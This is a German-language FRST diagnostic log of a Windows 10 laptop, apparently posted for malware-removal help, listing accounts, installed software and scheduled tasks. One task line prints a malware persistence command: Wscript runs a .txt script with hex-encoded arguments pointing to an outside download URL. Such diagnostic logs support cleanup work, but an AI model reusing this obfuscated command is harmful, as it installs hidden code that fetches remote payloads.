Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 28-05-2017
durchgeführt von Sven (28-05-2017 13:32:56)
Gestartet von C:\Users\Sven\Desktop
Windows 10 Home Version 1607 (X64) (2016-08-16 14:50:19)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1373792661-1632314611-2226728799-500 - Administrator - Enabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-1373792661-1632314611-2226728799-503 - Limited - Disabled)
Gast (S-1-5-21-1373792661-1632314611-2226728799-501 - Limited - Disabled)
Sven (S-1-5-21-1373792661-1632314611-2226728799-1001 - Administrator - Enabled) => C:\Users\Sven
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
7-Zip 15.14 (x64) (HKLM\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Benutzerhandbücher (x32 Version: 3.0.0.3 - Lenovo) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
chip 1-click download service (HKLM-x32\...\{503CA94E-0834-4CEE-AD92-BA17AF4E809A}) (Version: 3.6.9.0 - Chip Digital GmbH)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.0.2810 - CyberLink Corp.)
CyberLink PowerDirector 10 (Version: 10.0.0.2810 - CyberLink Corp.) Hidden
Dependency Package Update (Version: 1.6.25.00 - Lenovo Inc.) Hidden
Dependency Package Update (Version: 1.6.29.00 - Lenovo Inc.) Hidden
Dependency Package Update (Version: 1.6.38.00 - Lenovo Inc.) Hidden
Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.5.1.1 - Dolby Laboratories Inc)
dreamboxEDIT -- The one and only settings editor for your Dreambox (HKLM-x32\...\dreamboxEDIT) (Version: - )
E-Channelizer (HKLM-x32\...\{19237c60-aa16-472d-bc0c-648b1724239e}) (Version: 3.0.0.5000 - Sayyid A.)
E-Channelizer (x32 Version: 3.0.0.5000 - Sayyid A.) Hidden
Emergency Download Driver (HKLM-x32\...\{3F0F5AB4-C9CE-4226-8393-E9CFF8369D9D}) (Version: 1.1.16.1526 - Microsoft)
Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.5.0.20 - Lenovo)
Energy Manager (x32 Version: 1.5.0.20 - Lenovo) Hidden
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
EPSON XP-302 303 305 306 Series Printer Uninstall (HKLM\...\EPSON XP-302 303 305 306 Series) (Version: - SEIKO EPSON Corporation)
FFU Loader Driver 1.0.0 (HKLM-x32\...\{7209d085-ed88-4a08-beb2-c49db2b9e838}) (Version: 1.0.0 - Microsoft)
FFU Loader Driver 1.0.0 (x32 Version: 1.0.0 - Microsoft) Hidden
FileZilla Client 3.24.0 (HKLM-x32\...\FileZilla Client) (Version: 3.24.0 - Tim Kosse)
Genesys USB Mass Storage Device (HKLM-x32\...\{959B7F35-2819-40C5-A0CD-3C53B5FCC935}) (Version: 4.3.2.0 - Genesys Logic)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Hightail for Lenovo (HKLM\...\{2F10E937-F6D7-4174-8AB9-B299E8FC5CEC}) (Version: 2.4.97.2857 - Hightail, Inc.)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{0EC7F9CC-4741-45AE-9F55-6E9343F726F5}) (Version: 1.1.0.36960 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.14.1724 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 17.0.1347.2) (HKLM\...\{302600C1-6BDF-4FD1-1312-148929CC1385}) (Version: 17.0.1312.0414 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.0.2.1000 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{f0aecb48-77c7-45fa-b264-ea1945fdee59}) (Version: 18.33.0 - Intel Corporation)
IsoBuster 3.7 (HKLM-x32\...\IsoBuster_is1) (Version: 3.7 - Smart Projects)
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.15 - Oracle Corporation)
Lenovo Dependency Package (HKLM\...\Lenovo Dependency Package_is1) (Version: 1.6.25.00 - Lenovo Group Limited)
Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10269 - Realtek Semiconductor Corp.)
Lenovo EasyCamera (HKLM-x32\...\{E399A5B3-ED53-4DEA-AF04-8011E1EB1EAC}) (Version: 6.3.9600.11103 - Realtek Semiconductor Corp.)
Lenovo Flex 2 Demo (HKLM-x32\...\{8300CA15-AD32-4C12-A6D4-121DEBCA11CC}) (Version: 1.0.0 - Lenovo)
Lenovo FusionEngine (HKLM-x32\...\Lenovo FusionEngine) (Version: 1.0.13.0 - Lenovo, Inc.)
Lenovo Mobile Phone Wireless Import (HKLM-x32\...\InstallShield_{DFB2E0D6-8DDE-49A4-B8F7-03C14DACCBA6}) (Version: 1.1.1.9 - Lenovo)
Lenovo Mobile Phone Wireless Import (x32 Version: 1.1.1.9 - Lenovo) Hidden
Lenovo Motion Control (HKLM-x32\...\InstallShield_{0D740B00-2307-44AC-B91B-F3E67444ECA6}) (Version: 2.0.1.0107 - PointGrab)
Lenovo Motion Control (x32 Version: 2.0.1.0107 - PointGrab) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.2326 - CyberLink Corp.)
Lenovo OneKey Recovery (Version: 8.1.0.2326 - CyberLink Corp.) Hidden
Lenovo PhoneCompanion (HKLM-x32\...\InstallShield_{0F82EA83-B0C5-4AB9-9695-DFE92C5FD57B}) (Version: 1.2.0.0 - Lenovo)
Lenovo PhoneCompanion (x32 Version: 1.2.0.0 - Lenovo) Hidden
Lenovo Photo Master (HKLM-x32\...\InstallShield_{BC94C56A-3649-420C-8756-2ADEBE399D33}) (Version: 1.0.1823.01 - CyberLink Corp.)
Lenovo Photo Master (x32 Version: 1.0.1823.01 - CyberLink Corp.) Hidden
Lenovo PowerDVD10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5630.52 - CyberLink Corp.)
Lenovo PowerDVD10 (x32 Version: 10.0.5630.52 - CyberLink Corp.) Hidden
Lenovo SHAREit (HKLM-x32\...\Lenovo SHAREit_is1) (Version: 2.0.5.0 - Lenovo Group Limited)
Lenovo Smart Voice (HKLM\...\Lenovo SmartVoice) (Version: 1.0.2.4 - Lenovo)
Lenovo Transition (HKLM\...\Lenovo Transition) (Version: 2.1.14.1221 - Lenovo)
Lenovo Updates (HKLM-x32\...\InstallShield_{A2E1E9F0-0B68-4166-8C7F-85B563B84DF4}) (Version: 1.1.0.59 - Lenovo)
Lenovo Updates (x32 Version: 1.1.0.59 - Lenovo) Hidden
Lumia UEFI Blue Driver (HKLM-x32\...\{9D2A75FE-8CE1-4297-AEC1-A097D47BACE9}) (Version: 1.1.10.1526 - Microsoft)
Magic Transfer (HKLM\...\{AD2B2BD1-A1D7-4798-8FDD-B2A58FD94E68}) (Version: 1.1.1.11 - )
Magic Transfer (HKLM-x32\...\InstallShield_{AD2B2BD1-A1D7-4798-8FDD-B2A58FD94E68}) (Version: 1.1.1.11 - Lenovo)
Magic Transfer (x32 Version: 1.1.1.11 - Lenovo) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0001.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (Deutsch) (HKLM-x32\...\{CBD7095F-7211-43FD-9FE7-FB08D753AF79}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (Deutsch) (HKLM-x32\...\{EE8BD24B-75E1-4BBF-86B9-91FE16ADE71C}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (Deutsch) (HKLM-x32\...\{529EFF09-750D-48B9-A47A-34A3B6248C3F}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Help Viewer 2.2 Sprachpaket - DEU (HKLM-x32\...\Microsoft Help Viewer 2.2 Sprachpaket - DEU) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1373792661-1632314611-2226728799-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 DEU (HKLM\...\{98225B15-ECF5-4645-B5AC-F8C5E869A5D5}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects (HKLM-x32\...\{4F4CB3E2-9D2F-465A-854B-8276B02F4E7D}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects (x64) (HKLM\...\{03CB711D-679E-46ED-851B-C568418CF914}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom (HKLM\...\{F2A2DB39-2C5A-4764-AA0F-5AB112663FFA}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service (HKLM-x32\...\{06BE8B71-46C6-434B-869E-85C58EF3120A}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 RC Redistributable (x64) - 14.10.24911 (HKLM-x32\...\{0a898fd4-a90b-46e2-8f20-46ddb3f24b6e}) (Version: 14.10.24911.0 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2014 (HKLM\...\{7F6DCED8-6A2B-4436-AF20-8F659D04E388}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2014 (HKLM-x32\...\{48BF289B-F3FA-4023-9251-80ABF7B726F9}) (Version: 12.0.2402.29 - Microsoft Corporation)
MiniTool Power Data Recovery Edition 7.0 (HKLM\...\MiniTool Power Data Recovery Edition_is1) (Version: - MiniTool Solution Ltd.)
Mozilla Firefox 53.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.3 (x86 de)) (Version: 53.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.3.6347 - Mozilla)
NAS Starter Utility (HKLM-x32\...\NAS Starter Utility) (Version: - ZyXEL)
Nitro Pro 8 (HKLM\...\{84DAF9F1-513C-49F8-89D2-63CB3F4A7E39}) (Version: 8.5.7.1 - Nitro)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.2.2 - Notepad++ Team)
OpenOffice 4.1.2 (HKLM-x32\...\{F5CAB1AF-7B1A-4CEC-B829-A3F699473AE1}) (Version: 4.12.9782 - Apache Software Foundation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM-x32\...\{D5409B11-EF28-37A1-AE7A-6051A5BAD923}) (Version: 4.5.50932 - Microsoft Corporation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM-x32\...\{4860C1E5-CE58-4D32-89DE-37951333B4C9}) (Version: 4.6.01055 - Microsoft Corporation)
Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.6.0.10525 - CyberLink Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7188 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.53 - Piriform)
Roslyn Language Services - x86 (x32 Version: 14.0.25431 - Microsoft Corporation) Hidden
SteuerSparErklärung 2016 (HKLM-x32\...\{D331D50C-C578-423B-8BC7-94D3133CE315}) (Version: 21.37.107 - Akademische Arbeitsgemeinschaft)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.5 - Synaptics Incorporated)
TAXMAN 2017 start (HKLM-x32\...\{BBF23ABC-E31E-4DAA-B2AA-8B660C5A6D45}) (Version: 22.32.81 - Haufe-Lexware GmbH & Co.KG)
Team Explorer for Microsoft Visual Studio 2015 Update 3.1 (x32 Version: 14.102.25619 - Microsoft) Hidden
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.66695 - TeamViewer)
Thimbleweed Park (HKLM-x32\...\1325604411_is1) (Version: 1.0.864 - GOG.com)
TypeScript Tools for Microsoft Visual Studio 2015 (x32 Version: 1.8.36.0 - Microsoft Corporation) Hidden
Universal CRT Redistributable (x32 Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (x32 Version: 10.1.14393.33 - Microsoft Corporation) Hidden
User Manuals (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 3.0.0.3 - Lenovo)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
WebGrab+Plus (HKLM-x32\...\{AEDBC508-8A29-453C-9C3C-A72728F2AD31}) (Version: 1.1.1 - ServerCare)
WG-Dependencies (HKU\S-1-5-21-1373792661-1632314611-2226728799-1001\...\4cae215cafa50d85) (Version: 1.0.0.0 - WG-Dependencies)
WhatsApp (HKU\S-1-5-21-1373792661-1632314611-2226728799-1001\...\WhatsApp) (Version: 0.2.1061 - WhatsApp)
Windows Device Recovery Tool 3.11.34101 (HKLM-x32\...\{c4570e47-39e0-450b-a02c-d64965cbf0f0}) (Version: 3.11.34101 - Microsoft)
Windows IP Over USB (HKLM-x32\...\{FF0EA481-42DB-A8AE-8356-48C09F7D953D}) (Version: 10.1.10586.15 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{45D392D2-5956-4646-9CA6-83CBF67507B6}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.14393.33 (HKLM-x32\...\{f23f94c5-8bba-4202-85ad-c83d4402cdc1}) (Version: 10.1.14393.33 - Microsoft Corporation)
Windows-Treiberpaket - Lenovo (ACPIVPC) System (09/24/2013 19.29.2.34) (HKLM\...\EE9B1F2037C580F36D92FA431CC02BFF04C31F15) (Version: 09/24/2013 19.29.2.34 - Lenovo)
Windows-Treiberpaket - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)
Windows-Treiberpaket - Microsoft USBDevice (02/19/2016 1.0.0.0) (HKLM\...\01D4AA89568B59E5941907D403E3B682EE413AB7) (Version: 02/19/2016 1.0.0.0 - Microsoft)
WinSCP 5.9.3 (HKLM-x32\...\winscp3_is1) (Version: 5.9.3 - Martin Prikryl)
WinUsb CoInstallers (HKLM-x32\...\{9755918A-CDF8-4F1E-8453-6359CF1A330A}) (Version: 1.1.12.1526 - Microsoft)
WinUSB Compatible ID Drivers (HKLM-x32\...\{A4A0B236-6046-4CAB-8177-1EAF61112C75}) (Version: 1.1.11.1526 - Microsoft)
WinUSB Drivers ext (HKLM-x32\...\{29BAAF65-09E5-4F52-8D15-2FAF2E23A8DC}) (Version: 1.1.24.1544 - Microsoft)
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.72.0.388 - Zemana Ltd.)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {0136CD08-CDE2-472C-9053-91F931AF733C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {1093CBF6-B21E-4B64-AE48-7B47053E6623} - \Microsoft\Windows\DeviceSettings\Vucosh -> Keine Datei <==== ACHTUNG
Task: {1C48241E-633E-4848-98B4-6A027A60CCFD} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {26752E65-BD05-4754-A436-4AE9C3165499} - System32\Tasks\Lenovo Smart Voice => C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvTrayLoad.exe [2014-09-11] (Lenovo)
Task: {2C1B06A0-3D39-4D58-B299-D3D8DFB00C4A} - System32\Tasks\Yahoo! Powered linil => Wscript.exe "C:\ProgramData\{AA6B6F08-2029-E5CE-A6EF-7B8C3CADF042}\dila.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b41413642364630382d323032392d453543452d413645462d3742384333434144463034327d5c6d6f72696e65" "433a5c50726f6772616d446174615c7b41413642364630382d323032392d453543452d413645 (Der Dateneintrag hat 78 mehr Zeichen).
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {38F5D8A8-B289-4AFC-8251-0AD0D5518ED9} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {516535FB-C3D5-4936-B453-FD7762A05FB0} - \WPD\SqmUpload_S-1-5-21-1373792661-1632314611-2226728799-1001 -> Keine Datei <==== ACHTUNG
Task: {5BE50B96-5BEC-498D-A08E-D101ACAD88C0} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe
Task: {6252FBB7-0A59-414E-9287-3C6EE52A9F7F} - System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => C:\\ProgramData\\VideoMemoryDiagnostic\\vmdiag.exe [2017-05-06] ()
Task: {78D21791-A79E-48AB-A093-8F12CC5BBDBB} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {7E68DF44-4E3C-4D7D-AA06-4B2E0AA9912E} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2013-03-07] (Intel Corporation)
Task: {8522FCEF-5F2E-4F4A-AEFB-961C4199E5E7} - System32\Tasks\Lenovo\Dependency Package Auto Update => C:\Program Files\Lenovo\iMController\AutoUpdate.exe [2014-05-21] ()
Task: {89BDBCA2-9745-4EC0-9675-E30AD2859482} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-04-11] (Google Inc.)
Task: {93DFD22C-797A-4F6D-BC51-6FC59D2567B9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2014-05-30] (Lenovo)
Task: {9E63E507-A0EC-456F-9D0C-CC15F593E7D7} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2013-03-07] (Intel Corporation)
Task: {9E8791D9-F9AA-4ED7-AEBA-BA194CFA638F} - System32\Tasks\{7CE76492-560C-473D-A02D-4B1B1E0320D0} => pcalua.exe -a C:\Users\Sven\AppData\Local\{C329F575-E781-99CD-8A19-BC25AE7140BD}\uninst.exe -c -P=/Uninstall /s /noun /DelSelfDir
Task: {AB376417-DD8E-4809-A3A6-484C651B7425} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-04-28] (Microsoft Corporation)
Task: {BF109523-6907-49EE-8B00-9F96BD675A71} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-04-11] (Google Inc.)
Task: {C0B96C75-7BDE-4B25-98F0-CAA0258BD614} - \Keyspan Calculator -> Keine Datei <==== ACHTUNG
Task: {C71C3C4D-0FCD-4EF0-8DB8-84841C8FF109} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-04-28] (Microsoft Corporation)
Task: {D2EA72D3-3057-4DAB-BDBD-B90A73A26141} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {D387F0E7-D4E7-4F3A-B6FA-AD4DAAEA4287} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {D97A3C0A-F154-48B8-BE13-DA7803DDE766} - System32\Tasks\PDVDServ Task => C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.EXE [2013-03-08] (CyberLink Corp.)
Task: {EE79C030-2181-489C-8F3E-6C68A32D7753} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-04-28] (Microsoft Corporation)
Task: {F379552E-AB0E-4CD5-82F4-F71F72470247} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {F40AC3D8-7EDF-4CF7-BE7A-A108CD8768D3} - System32\Tasks\Nomitain Adapter => C:\Program Files (x86)\Shufward\ghermise.exe [2017-05-23] (Google Inc.)
Task: {F843B87E-8569-48D2-A2A1-C770D9E064F3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-04-28] (Microsoft Corporation)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\Yahoo! Powered linil.job => Wscript.exe C:\ProgramData\{AA6B6F08-2029-E5CE-A6EF-7B8C3CADF042}\dila.txt <==== ACHTUNG
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-05-11 16:46 - 2017-04-28 02:49 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2014-09-11 05:10 - 2014-09-11 05:10 - 00061200 _____ () C:\ProgramData\LenovoTransition\Server\x64\dptf.dll
2014-09-11 05:13 - 2012-04-24 12:43 - 00390632 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2017-01-13 21:10 - 2017-01-13 21:10 - 00052400 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2016-11-27 19:55 - 2016-11-27 19:55 - 00230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2017-05-23 18:54 - 2017-05-23 18:54 - 00154480 _____ () C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll
2016-05-27 15:50 - 2016-11-02 00:05 - 00401896 _____ () C:\WINDOWS\system32\igfxTray.exe
2016-09-14 17:06 - 2016-09-07 06:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-25 14:44 - 2017-03-04 08:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-25 14:45 - 2017-03-04 08:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
